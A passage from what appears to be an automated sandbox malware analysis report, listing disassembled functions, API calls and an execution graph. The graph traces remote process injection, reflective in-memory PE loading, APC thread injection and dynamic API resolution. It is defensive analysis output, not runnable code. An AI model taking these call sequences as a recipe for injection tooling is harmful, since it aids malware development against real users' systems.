                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f07fdb0f4cdb3fe7b309b0019efe0e4d72702c16d4dcda1328bac8cc5dd3527
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E11AC75940745AED721EFB5CC41BCAB7F4AB05300F14891AE5A2CB292EA34A508AB90
                                                                                                                                                                                                                                                                      Function 00FB4070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00FB4261,00FF4400,000000FF,8F6E4A30,00000000,?,00000000,?,?,?,00FF4400,000000FF,?,00FB3A75,?), ref: 00FB4096
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,40000022,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4154
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4177
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FB4217
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Local$AllocFree
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2012307162-0
                                                                                                                                                                                                                                                                      • Opcode ID: b8a3cc632cdcd55fed907fa846dbd9a6fd8c0ea6ee86ab03814d90c0d44f50f1
                                                                                                                                                                                                                                                                      • Instruction ID: 324e46309f732c17b651a78611df481f6c3c70c3793b0817e33970e38f5d5180
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8a3cc632cdcd55fed907fa846dbd9a6fd8c0ea6ee86ab03814d90c0d44f50f1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2151BAB1E002069FCB18DF6DCA85AAEBBA5EB48350F14462DE925E7381D734A940DF90
                                                                                                                                                                                                                                                                      Function 00FB1D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00FB1E01
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00FB1E21
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00FB1EA7
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000001,8F6E4A30,00000000,00000000,00FF3C40,000000FF,?,00000000), ref: 00FB1F2D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Local$AllocFree
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2012307162-0
                                                                                                                                                                                                                                                                      • Opcode ID: c382ec009d142da251d342395a073ebe0ffbf3b4f0c6430611a2b8f908a09686
                                                                                                                                                                                                                                                                      • Instruction ID: d41a3dc1d4ac27c489716052c2a03b0601426ec5e8f6f1914e1c3ca85ca0c724
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c382ec009d142da251d342395a073ebe0ffbf3b4f0c6430611a2b8f908a09686
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51E272A042159FC715EF29DC80AABB7E9FF48360F500A2EF856D7290DB70E904DB91

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:3.2%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.2%
                                                                                                                                                                                                                                                                      Signature Coverage:12.5%
                                                                                                                                                                                                                                                                      Total number of Nodes:1088
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:64
                                                                                                                                                                                                                                                                      execution_graph 49731 1ff4cb03f40 49733 1ff4cb03f69 49731->49733 49732 1ff4cb03fc9 49733->49732 49734 1ff4cb03fc7 NtAllocateVirtualMemory 49733->49734 49734->49732 49735 1ff4cb04be0 49737 1ff4cb04c02 49735->49737 49736 1ff4cb04c5e 49737->49736 49738 1ff4cb04c5c NtProtectVirtualMemory 49737->49738 49738->49736 49548 273f41380 Sleep VirtualAllocEx 49549 273f413d2 WriteProcessMemory 49548->49549 49551 273f4144e 49548->49551 49550 273f41402 CreateRemoteThread 49549->49550 49549->49551 49550->49551 49552 273f4143c 49550->49552 49552->49551 49553 273f41440 WaitForSingleObject 49552->49553 49553->49551 49739 273f414d0 49740 273f414e0 SleepEx 49739->49740 49740->49740 49554 1ff4b0a15e0 49555 1ff4b0a1608 49554->49555 49560 1ff4b0a15fe 49554->49560 49556 1ff4b0a1619 49555->49556 49558 1ff4b0a168c VirtualProtect 49555->49558 49557 1ff4b0a1664 VirtualFree 49556->49557 49556->49560 49557->49560 49558->49560 49561 1ff4b0a1200 49562 1ff4b0a1215 49561->49562 49563 1ff4b0a121f 49561->49563 49570 1ff4b0a1070 VirtualQuery 49562->49570 49567 1ff4b0a122d 49563->49567 49569 1ff4b0a11c0 VirtualAlloc 49563->49569 49566 1ff4b0a123d 49566->49567 49571 1ff4b0a1190 VirtualFree 49566->49571 49569->49566 49570->49563 49571->49567 49572 1ff4b0a1000 49578 1ff4b0a2650 49572->49578 49576 1ff4b0a1055 ExitProcess 49582 1ff4b0a2050 49578->49582 49581 1ff4b0a26b0 SetLastError SetLastError SetLastError SetLastError SetLastError 49581->49576 49617 1ff4b0a1340 49582->49617 49585 1ff4b0a103a 49585->49581 49586 1ff4b0a20d1 49588 1ff4b0a1340 SetLastError 49586->49588 49587 1ff4b0a20bf SetLastError 49587->49585 49589 1ff4b0a20f8 49588->49589 49589->49585 49590 1ff4b0a213e 49589->49590 49591 1ff4b0a212c SetLastError 49589->49591 49592 1ff4b0a214e SetLastError 49590->49592 49593 1ff4b0a2160 49590->49593 49591->49585 49592->49585 49594 1ff4b0a216f SetLastError 49593->49594 49596 1ff4b0a2181 GetNativeSystemInfo 49593->49596 49594->49585 49597 1ff4b0a229a VirtualAlloc 49596->49597 49598 1ff4b0a2288 SetLastError 49596->49598 49599 1ff4b0a22c7 VirtualAlloc 49597->49599 49600 1ff4b0a22ff GetProcessHeap HeapAlloc 49597->49600 49598->49585 49599->49600 49601 1ff4b0a22ed SetLastError 49599->49601 49602 1ff4b0a234b 49600->49602 49603 1ff4b0a2326 VirtualFree SetLastError 49600->49603 49601->49585 49604 1ff4b0a1340 SetLastError 49602->49604 49603->49585 49605 1ff4b0a23fc 49604->49605 49606 1ff4b0a240a VirtualAlloc 49605->49606 49615 1ff4b0a2400 49605->49615 49607 1ff4b0a2450 49606->49607 49620 1ff4b0a1380 49607->49620 49610 1ff4b0a24ac 49610->49615 49628 1ff4b0a1c80 7 API calls 49610->49628 49612 1ff4b0a2527 49612->49615 49629 1ff4b0a1790 VirtualFree VirtualProtect 49612->49629 49614 1ff4b0a2547 49614->49615 49616 1ff4b0a25da SetLastError 49614->49616 49615->49585 49630 1ff4b0a28e0 VirtualFree VirtualFree GetProcessHeap HeapFree 49615->49630 49616->49615 49618 1ff4b0a136e 49617->49618 49619 1ff4b0a135f SetLastError 49617->49619 49618->49585 49618->49586 49618->49587 49619->49618 49626 1ff4b0a13ce 49620->49626 49621 1ff4b0a149c 49623 1ff4b0a1340 SetLastError 49621->49623 49622 1ff4b0a1458 49622->49610 49625 1ff4b0a14c0 49623->49625 49624 1ff4b0a141e VirtualAlloc 49624->49622 49624->49626 49625->49622 49627 1ff4b0a14cb VirtualAlloc 49625->49627 49626->49621 49626->49622 49626->49624 49627->49622 49628->49612 49629->49614 49630->49585 49631 1ff4cad1600 49633 1ff4cad162c 49631->49633 49632 1ff4cad1792 RtlExitUserThread 49633->49632 49640 1ff4cb03ba0 49633->49640 49635 1ff4cad1717 49646 1ff4cae9830 49635->49646 49637 1ff4cad1735 49638 1ff4cafb4e0 RtlFreeHeap 49637->49638 49639 1ff4cad173d 49638->49639 49639->49632 49641 1ff4cb03bc7 49640->49641 49642 1ff4cb03bd8 49640->49642 49650 1ff4cb03cd0 RtlFreeHeap 49641->49650 49645 1ff4cb03c87 49642->49645 49651 1ff4cb03cd0 RtlFreeHeap 49642->49651 49645->49635 49648 1ff4cae984d 49646->49648 49647 1ff4cae9886 49648->49647 49652 1ff4caedfc0 49648->49652 49650->49642 49651->49645 49653 1ff4caedff1 49652->49653 49654 1ff4caee03d 49653->49654 49656 1ff4cafb4e0 49653->49656 49654->49647 49657 1ff4cafb523 49656->49657 49658 1ff4cafb4f0 49656->49658 49657->49654 49658->49657 49659 1ff4cafb511 RtlFreeHeap 49658->49659 49659->49657 49741 1ff4cad71b0 49742 1ff4cad71c6 49741->49742 49749 1ff4cad2950 49742->49749 49744 1ff4cad71f5 49745 1ff4cb04360 NtCreateThreadEx 49744->49745 49746 1ff4cad730e 49745->49746 49747 1ff4cb04ff0 NtQueueApcThread 49746->49747 49748 1ff4cad732d 49747->49748 49766 1ff4cae16a0 49749->49766 49751 1ff4cad2959 49938 1ff4cae01a0 49751->49938 49753 1ff4cad2963 49754 1ff4cae0f99 49753->49754 50142 1ff4cadcce0 49753->50142 49754->49744 49757 1ff4cadcce0 LdrGetProcedureAddress 49758 1ff4cae0f13 49757->49758 49759 1ff4cadcce0 LdrGetProcedureAddress 49758->49759 49760 1ff4cae0f3c 49759->49760 49761 1ff4cadcce0 LdrGetProcedureAddress 49760->49761 49762 1ff4cae0f5b 49761->49762 49763 1ff4cadcce0 LdrGetProcedureAddress 49762->49763 49764 1ff4cae0f7a 49763->49764 49765 1ff4cadcce0 LdrGetProcedureAddress 49764->49765 49765->49754 49767 1ff4cae16a9 49766->49767 49768 1ff4cae21e1 49767->49768 49769 1ff4cadcce0 LdrGetProcedureAddress 49767->49769 49768->49751 49770 1ff4cae16c8 49769->49770 49771 1ff4cadcce0 LdrGetProcedureAddress 49770->49771 49772 1ff4cae16e0 49771->49772 49773 1ff4cadcce0 LdrGetProcedureAddress 49772->49773 49774 1ff4cae16f8 49773->49774 49775 1ff4cadcce0 LdrGetProcedureAddress 49774->49775 49776 1ff4cae1710 49775->49776 49777 1ff4cadcce0 LdrGetProcedureAddress 49776->49777 49778 1ff4cae1728 49777->49778 49779 1ff4cadcce0 LdrGetProcedureAddress 49778->49779 49780 1ff4cae1740 49779->49780 49781 1ff4cadcce0 LdrGetProcedureAddress 49780->49781 49782 1ff4cae1758 49781->49782 49783 1ff4cadcce0 LdrGetProcedureAddress 49782->49783 49784 1ff4cae1770 49783->49784 49785 1ff4cadcce0 LdrGetProcedureAddress 49784->49785 49786 1ff4cae1788 49785->49786 49787 1ff4cadcce0 LdrGetProcedureAddress 49786->49787 49788 1ff4cae17a0 49787->49788 49789 1ff4cadcce0 LdrGetProcedureAddress 49788->49789 49790 1ff4cae17b8 49789->49790 49791 1ff4cadcce0 LdrGetProcedureAddress 49790->49791 49792 1ff4cae17d0 49791->49792 49793 1ff4cadcce0 LdrGetProcedureAddress 49792->49793 49794 1ff4cae17e8 49793->49794 49795 1ff4cadcce0 LdrGetProcedureAddress 49794->49795 49796 1ff4cae1800 49795->49796 49797 1ff4cadcce0 LdrGetProcedureAddress 49796->49797 49798 1ff4cae1818 49797->49798 49799 1ff4cadcce0 LdrGetProcedureAddress 49798->49799 49800 1ff4cae1830 49799->49800 49801 1ff4cadcce0 LdrGetProcedureAddress 49800->49801 49802 1ff4cae1848 49801->49802 49803 1ff4cadcce0 LdrGetProcedureAddress 49802->49803 49804 1ff4cae1860 49803->49804 49805 1ff4cadcce0 LdrGetProcedureAddress 49804->49805 49806 1ff4cae1878 49805->49806 49807 1ff4cadcce0 LdrGetProcedureAddress 49806->49807 49808 1ff4cae1890 49807->49808 49809 1ff4cadcce0 LdrGetProcedureAddress 49808->49809 49810 1ff4cae18a8 49809->49810 49811 1ff4cadcce0 LdrGetProcedureAddress 49810->49811 49812 1ff4cae18c0 49811->49812 49813 1ff4cadcce0 LdrGetProcedureAddress 49812->49813 49814 1ff4cae18d8 49813->49814 49815 1ff4cadcce0 LdrGetProcedureAddress 49814->49815 49816 1ff4cae18f0 49815->49816 49817 1ff4cadcce0 LdrGetProcedureAddress 49816->49817 49818 1ff4cae1908 49817->49818 49819 1ff4cadcce0 LdrGetProcedureAddress 49818->49819 49820 1ff4cae1920 49819->49820 49821 1ff4cadcce0 LdrGetProcedureAddress 49820->49821 49822 1ff4cae1938 49821->49822 49823 1ff4cadcce0 LdrGetProcedureAddress 49822->49823 49824 1ff4cae1950 49823->49824 49825 1ff4cadcce0 LdrGetProcedureAddress 49824->49825 49826 1ff4cae1968 49825->49826 49827 1ff4cadcce0 LdrGetProcedureAddress 49826->49827 49828 1ff4cae1980 49827->49828 49829 1ff4cadcce0 LdrGetProcedureAddress 49828->49829 49830 1ff4cae1998 49829->49830 49831 1ff4cadcce0 LdrGetProcedureAddress 49830->49831 49832 1ff4cae19b0 49831->49832 49833 1ff4cadcce0 LdrGetProcedureAddress 49832->49833 49834 1ff4cae19c8 49833->49834 49835 1ff4cadcce0 LdrGetProcedureAddress 49834->49835 49836 1ff4cae19e0 49835->49836 49837 1ff4cadcce0 LdrGetProcedureAddress 49836->49837 49838 1ff4cae19f8 49837->49838 49839 1ff4cadcce0 LdrGetProcedureAddress 49838->49839 49840 1ff4cae1a10 49839->49840 49841 1ff4cadcce0 LdrGetProcedureAddress 49840->49841 49842 1ff4cae1a28 49841->49842 49843 1ff4cadcce0 LdrGetProcedureAddress 49842->49843 49844 1ff4cae1a40 49843->49844 49845 1ff4cadcce0 LdrGetProcedureAddress 49844->49845 49846 1ff4cae1a58 49845->49846 49847 1ff4cadcce0 LdrGetProcedureAddress 49846->49847 49848 1ff4cae1a70 49847->49848 49849 1ff4cadcce0 LdrGetProcedureAddress 49848->49849 49850 1ff4cae1a88 49849->49850 49851 1ff4cadcce0 LdrGetProcedureAddress 49850->49851 49852 1ff4cae1aa0 49851->49852 49853 1ff4cadcce0 LdrGetProcedureAddress 49852->49853 49854 1ff4cae1ab8 49853->49854 49855 1ff4cadcce0 LdrGetProcedureAddress 49854->49855 49856 1ff4cae1ad0 49855->49856 49857 1ff4cadcce0 LdrGetProcedureAddress 49856->49857 49858 1ff4cae1ae8 49857->49858 49859 1ff4cadcce0 LdrGetProcedureAddress 49858->49859 49860 1ff4cae1b00 49859->49860 49861 1ff4cadcce0 LdrGetProcedureAddress 49860->49861 49862 1ff4cae1b18 49861->49862 49863 1ff4cadcce0 LdrGetProcedureAddress 49862->49863 49864 1ff4cae1b30 49863->49864 49865 1ff4cadcce0 LdrGetProcedureAddress 49864->49865 49866 1ff4cae1b48 49865->49866 49867 1ff4cadcce0 LdrGetProcedureAddress 49866->49867 49868 1ff4cae1b60 49867->49868 49869 1ff4cadcce0 LdrGetProcedureAddress 49868->49869 49870 1ff4cae1b78 49869->49870 49871 1ff4cadcce0 LdrGetProcedureAddress 49870->49871 49872 1ff4cae1b90 49871->49872 49873 1ff4cadcce0 LdrGetProcedureAddress 49872->49873 49874 1ff4cae1bc1 49873->49874 49875 1ff4cadcce0 LdrGetProcedureAddress 49874->49875 49876 1ff4cae1bf2 49875->49876 49877 1ff4cadcce0 LdrGetProcedureAddress 49876->49877 49878 1ff4cae1c23 49877->49878 49879 1ff4cadcce0 LdrGetProcedureAddress 49878->49879 49880 1ff4cae1c54 49879->49880 49881 1ff4cadcce0 LdrGetProcedureAddress 49880->49881 49882 1ff4cae1c85 49881->49882 49883 1ff4cadcce0 LdrGetProcedureAddress 49882->49883 49884 1ff4cae1cb6 49883->49884 49885 1ff4cadcce0 LdrGetProcedureAddress 49884->49885 49886 1ff4cae1ce7 49885->49886 49887 1ff4cadcce0 LdrGetProcedureAddress 49886->49887 49888 1ff4cae1d18 49887->49888 49889 1ff4cadcce0 LdrGetProcedureAddress 49888->49889 49890 1ff4cae1d49 49889->49890 49891 1ff4cadcce0 LdrGetProcedureAddress 49890->49891 49892 1ff4cae1d7a 49891->49892 49893 1ff4cadcce0 LdrGetProcedureAddress 49892->49893 49894 1ff4cae1dab 49893->49894 49895 1ff4cadcce0 LdrGetProcedureAddress 49894->49895 49896 1ff4cae1ddc 49895->49896 49897 1ff4cadcce0 LdrGetProcedureAddress 49896->49897 49898 1ff4cae1e0d 49897->49898 49899 1ff4cadcce0 LdrGetProcedureAddress 49898->49899 49900 1ff4cae1e3e 49899->49900 49901 1ff4cadcce0 LdrGetProcedureAddress 49900->49901 49902 1ff4cae1e6f 49901->49902 49903 1ff4cadcce0 LdrGetProcedureAddress 49902->49903 49904 1ff4cae1ea0 49903->49904 49905 1ff4cadcce0 LdrGetProcedureAddress 49904->49905 49906 1ff4cae1ed1 49905->49906 49907 1ff4cadcce0 LdrGetProcedureAddress 49906->49907 49908 1ff4cae1f02 49907->49908 49909 1ff4cadcce0 LdrGetProcedureAddress 49908->49909 49910 1ff4cae1f33 49909->49910 49911 1ff4cadcce0 LdrGetProcedureAddress 49910->49911 49912 1ff4cae1f64 49911->49912 49913 1ff4cadcce0 LdrGetProcedureAddress 49912->49913 49914 1ff4cae1f95 49913->49914 49915 1ff4cadcce0 LdrGetProcedureAddress 49914->49915 49916 1ff4cae1fc6 49915->49916 49917 1ff4cadcce0 LdrGetProcedureAddress 49916->49917 49918 1ff4cae1ff7 49917->49918 49919 1ff4cadcce0 LdrGetProcedureAddress 49918->49919 49920 1ff4cae2028 49919->49920 49921 1ff4cadcce0 LdrGetProcedureAddress 49920->49921 49922 1ff4cae2059 49921->49922 49923 1ff4cadcce0 LdrGetProcedureAddress 49922->49923 49924 1ff4cae208a 49923->49924 49925 1ff4cadcce0 LdrGetProcedureAddress 49924->49925 49926 1ff4cae20bb 49925->49926 49927 1ff4cadcce0 LdrGetProcedureAddress 49926->49927 49928 1ff4cae20ec 49927->49928 49929 1ff4cadcce0 LdrGetProcedureAddress 49928->49929 49930 1ff4cae211d 49929->49930 49931 1ff4cadcce0 LdrGetProcedureAddress 49930->49931 49932 1ff4cae214e 49931->49932 49933 1ff4cadcce0 LdrGetProcedureAddress 49932->49933 49934 1ff4cae217f 49933->49934 49935 1ff4cadcce0 LdrGetProcedureAddress 49934->49935 49936 1ff4cae21b0 49935->49936 49937 1ff4cadcce0 LdrGetProcedureAddress 49936->49937 49937->49768 49939 1ff4cae01ce 49938->49939 49940 1ff4cae0e4a 49939->49940 49941 1ff4cadcce0 LdrGetProcedureAddress 49939->49941 49940->49753 49942 1ff4cae0228 49941->49942 49943 1ff4cadcce0 LdrGetProcedureAddress 49942->49943 49944 1ff4cae0243 49943->49944 49945 1ff4cadcce0 LdrGetProcedureAddress 49944->49945 49946 1ff4cae026c 49945->49946 49947 1ff4cadcce0 LdrGetProcedureAddress 49946->49947 49948 1ff4cae028b 49947->49948 49949 1ff4cadcce0 LdrGetProcedureAddress 49948->49949 49950 1ff4cae02aa 49949->49950 49951 1ff4cadcce0 LdrGetProcedureAddress 49950->49951 49952 1ff4cae02c9 49951->49952 49953 1ff4cadcce0 LdrGetProcedureAddress 49952->49953 49954 1ff4cae02e8 49953->49954 49955 1ff4cadcce0 LdrGetProcedureAddress 49954->49955 49956 1ff4cae0307 49955->49956 49957 1ff4cadcce0 LdrGetProcedureAddress 49956->49957 49958 1ff4cae0326 49957->49958 49959 1ff4cadcce0 LdrGetProcedureAddress 49958->49959 49960 1ff4cae0345 49959->49960 49961 1ff4cadcce0 LdrGetProcedureAddress 49960->49961 49962 1ff4cae0364 49961->49962 49963 1ff4cadcce0 LdrGetProcedureAddress 49962->49963 49964 1ff4cae0383 49963->49964 49965 1ff4cadcce0 LdrGetProcedureAddress 49964->49965 49966 1ff4cae03a2 49965->49966 49967 1ff4cadcce0 LdrGetProcedureAddress 49966->49967 49968 1ff4cae03c1 49967->49968 49969 1ff4cadcce0 LdrGetProcedureAddress 49968->49969 49970 1ff4cae03e0 49969->49970 49971 1ff4cadcce0 LdrGetProcedureAddress 49970->49971 49972 1ff4cae03ff 49971->49972 49973 1ff4cadcce0 LdrGetProcedureAddress 49972->49973 49974 1ff4cae041e 49973->49974 49975 1ff4cadcce0 LdrGetProcedureAddress 49974->49975 49976 1ff4cae043d 49975->49976 49977 1ff4cadcce0 LdrGetProcedureAddress 49976->49977 49978 1ff4cae045c 49977->49978 49979 1ff4cadcce0 LdrGetProcedureAddress 49978->49979 49980 1ff4cae047b 49979->49980 49981 1ff4cadcce0 LdrGetProcedureAddress 49980->49981 49982 1ff4cae049a 49981->49982 49983 1ff4cadcce0 LdrGetProcedureAddress 49982->49983 49984 1ff4cae04b9 49983->49984 49985 1ff4cadcce0 LdrGetProcedureAddress 49984->49985 49986 1ff4cae04d8 49985->49986 49987 1ff4cadcce0 LdrGetProcedureAddress 49986->49987 49988 1ff4cae04f7 49987->49988 49989 1ff4cadcce0 LdrGetProcedureAddress 49988->49989 49990 1ff4cae0516 49989->49990 49991 1ff4cadcce0 LdrGetProcedureAddress 49990->49991 49992 1ff4cae0535 49991->49992 49993 1ff4cadcce0 LdrGetProcedureAddress 49992->49993 49994 1ff4cae0554 49993->49994 49995 1ff4cadcce0 LdrGetProcedureAddress 49994->49995 49996 1ff4cae0573 49995->49996 49997 1ff4cadcce0 LdrGetProcedureAddress 49996->49997 49998 1ff4cae0592 49997->49998 49999 1ff4cadcce0 LdrGetProcedureAddress 49998->49999 50000 1ff4cae05b1 49999->50000 50001 1ff4cadcce0 LdrGetProcedureAddress 50000->50001 50002 1ff4cae05d0 50001->50002 50003 1ff4cadcce0 LdrGetProcedureAddress 50002->50003 50004 1ff4cae05ef 50003->50004 50005 1ff4cadcce0 LdrGetProcedureAddress 50004->50005 50006 1ff4cae060e 50005->50006 50007 1ff4cadcce0 LdrGetProcedureAddress 50006->50007 50008 1ff4cae062d 50007->50008 50009 1ff4cadcce0 LdrGetProcedureAddress 50008->50009 50010 1ff4cae064c 50009->50010 50011 1ff4cadcce0 LdrGetProcedureAddress 50010->50011 50012 1ff4cae066b 50011->50012 50013 1ff4cadcce0 LdrGetProcedureAddress 50012->50013 50014 1ff4cae068a 50013->50014 50015 1ff4cadcce0 LdrGetProcedureAddress 50014->50015 50016 1ff4cae06a9 50015->50016 50017 1ff4cadcce0 LdrGetProcedureAddress 50016->50017 50018 1ff4cae06c8 50017->50018 50019 1ff4cadcce0 LdrGetProcedureAddress 50018->50019 50020 1ff4cae06e7 50019->50020 50021 1ff4cadcce0 LdrGetProcedureAddress 50020->50021 50022 1ff4cae0706 50021->50022 50023 1ff4cadcce0 LdrGetProcedureAddress 50022->50023 50024 1ff4cae0725 50023->50024 50025 1ff4cadcce0 LdrGetProcedureAddress 50024->50025 50026 1ff4cae0744 50025->50026 50027 1ff4cadcce0 LdrGetProcedureAddress 50026->50027 50028 1ff4cae0763 50027->50028 50029 1ff4cadcce0 LdrGetProcedureAddress 50028->50029 50030 1ff4cae0782 50029->50030 50031 1ff4cadcce0 LdrGetProcedureAddress 50030->50031 50032 1ff4cae07a1 50031->50032 50033 1ff4cadcce0 LdrGetProcedureAddress 50032->50033 50034 1ff4cae07c0 50033->50034 50035 1ff4cadcce0 LdrGetProcedureAddress 50034->50035 50036 1ff4cae07df 50035->50036 50037 1ff4cadcce0 LdrGetProcedureAddress 50036->50037 50038 1ff4cae07fe 50037->50038 50039 1ff4cadcce0 LdrGetProcedureAddress 50038->50039 50040 1ff4cae081d 50039->50040 50041 1ff4cadcce0 LdrGetProcedureAddress 50040->50041 50042 1ff4cae083c 50041->50042 50043 1ff4cadcce0 LdrGetProcedureAddress 50042->50043 50044 1ff4cae085b 50043->50044 50045 1ff4cadcce0 LdrGetProcedureAddress 50044->50045 50046 1ff4cae087a 50045->50046 50047 1ff4cadcce0 LdrGetProcedureAddress 50046->50047 50048 1ff4cae0899 50047->50048 50049 1ff4cadcce0 LdrGetProcedureAddress 50048->50049 50050 1ff4cae08b8 50049->50050 50051 1ff4cadcce0 LdrGetProcedureAddress 50050->50051 50052 1ff4cae08d7 50051->50052 50053 1ff4cadcce0 LdrGetProcedureAddress 50052->50053 50054 1ff4cae08f6 50053->50054 50055 1ff4cadcce0 LdrGetProcedureAddress 50054->50055 50056 1ff4cae0915 50055->50056 50057 1ff4cadcce0 LdrGetProcedureAddress 50056->50057 50058 1ff4cae0934 50057->50058 50059 1ff4cadcce0 LdrGetProcedureAddress 50058->50059 50060 1ff4cae0953 50059->50060 50061 1ff4cadcce0 LdrGetProcedureAddress 50060->50061 50062 1ff4cae0972 50061->50062 50063 1ff4cadcce0 LdrGetProcedureAddress 50062->50063 50064 1ff4cae0991 50063->50064 50065 1ff4cadcce0 LdrGetProcedureAddress 50064->50065 50066 1ff4cae09b0 50065->50066 50067 1ff4cadcce0 LdrGetProcedureAddress 50066->50067 50068 1ff4cae09cf 50067->50068 50069 1ff4cadcce0 LdrGetProcedureAddress 50068->50069 50070 1ff4cae09ee 50069->50070 50071 1ff4cadcce0 LdrGetProcedureAddress 50070->50071 50072 1ff4cae0a0d 50071->50072 50073 1ff4cadcce0 LdrGetProcedureAddress 50072->50073 50074 1ff4cae0a2c 50073->50074 50075 1ff4cadcce0 LdrGetProcedureAddress 50074->50075 50076 1ff4cae0a4b 50075->50076 50077 1ff4cadcce0 LdrGetProcedureAddress 50076->50077 50078 1ff4cae0a6a 50077->50078 50079 1ff4cadcce0 LdrGetProcedureAddress 50078->50079 50080 1ff4cae0a89 50079->50080 50081 1ff4cadcce0 LdrGetProcedureAddress 50080->50081 50082 1ff4cae0aa8 50081->50082 50083 1ff4cadcce0 LdrGetProcedureAddress 50082->50083 50084 1ff4cae0ac7 50083->50084 50085 1ff4cadcce0 LdrGetProcedureAddress 50084->50085 50086 1ff4cae0ae6 50085->50086 50087 1ff4cadcce0 LdrGetProcedureAddress 50086->50087 50088 1ff4cae0b05 50087->50088 50089 1ff4cadcce0 LdrGetProcedureAddress 50088->50089 50090 1ff4cae0b24 50089->50090 50091 1ff4cadcce0 LdrGetProcedureAddress 50090->50091 50092 1ff4cae0b43 50091->50092 50093 1ff4cadcce0 LdrGetProcedureAddress 50092->50093 50094 1ff4cae0b62 50093->50094 50095 1ff4cadcce0 LdrGetProcedureAddress 50094->50095 50096 1ff4cae0b81 50095->50096 50097 1ff4cadcce0 LdrGetProcedureAddress 50096->50097 50098 1ff4cae0ba0 50097->50098 50099 1ff4cadcce0 LdrGetProcedureAddress 50098->50099 50100 1ff4cae0bbf 50099->50100 50101 1ff4cadcce0 LdrGetProcedureAddress 50100->50101 50102 1ff4cae0bde 50101->50102 50103 1ff4cadcce0 LdrGetProcedureAddress 50102->50103 50104 1ff4cae0bfd 50103->50104 50105 1ff4cadcce0 LdrGetProcedureAddress 50104->50105 50106 1ff4cae0c1c 50105->50106 50107 1ff4cadcce0 LdrGetProcedureAddress 50106->50107 50108 1ff4cae0c3b 50107->50108 50109 1ff4cadcce0 LdrGetProcedureAddress 50108->50109 50110 1ff4cae0c5a 50109->50110 50111 1ff4cadcce0 LdrGetProcedureAddress 50110->50111 50112 1ff4cae0c79 50111->50112 50113 1ff4cadcce0 LdrGetProcedureAddress 50112->50113 50114 1ff4cae0c98 50113->50114 50115 1ff4cadcce0 LdrGetProcedureAddress 50114->50115 50116 1ff4cae0cb7 50115->50116 50117 1ff4cadcce0 LdrGetProcedureAddress 50116->50117 50118 1ff4cae0cd6 50117->50118 50119 1ff4cadcce0 LdrGetProcedureAddress 50118->50119 50120 1ff4cae0cf5 50119->50120 50121 1ff4cadcce0 LdrGetProcedureAddress 50120->50121 50122 1ff4cae0d14 50121->50122 50123 1ff4cadcce0 LdrGetProcedureAddress 50122->50123 50124 1ff4cae0d33 50123->50124 50125 1ff4cadcce0 LdrGetProcedureAddress 50124->50125 50126 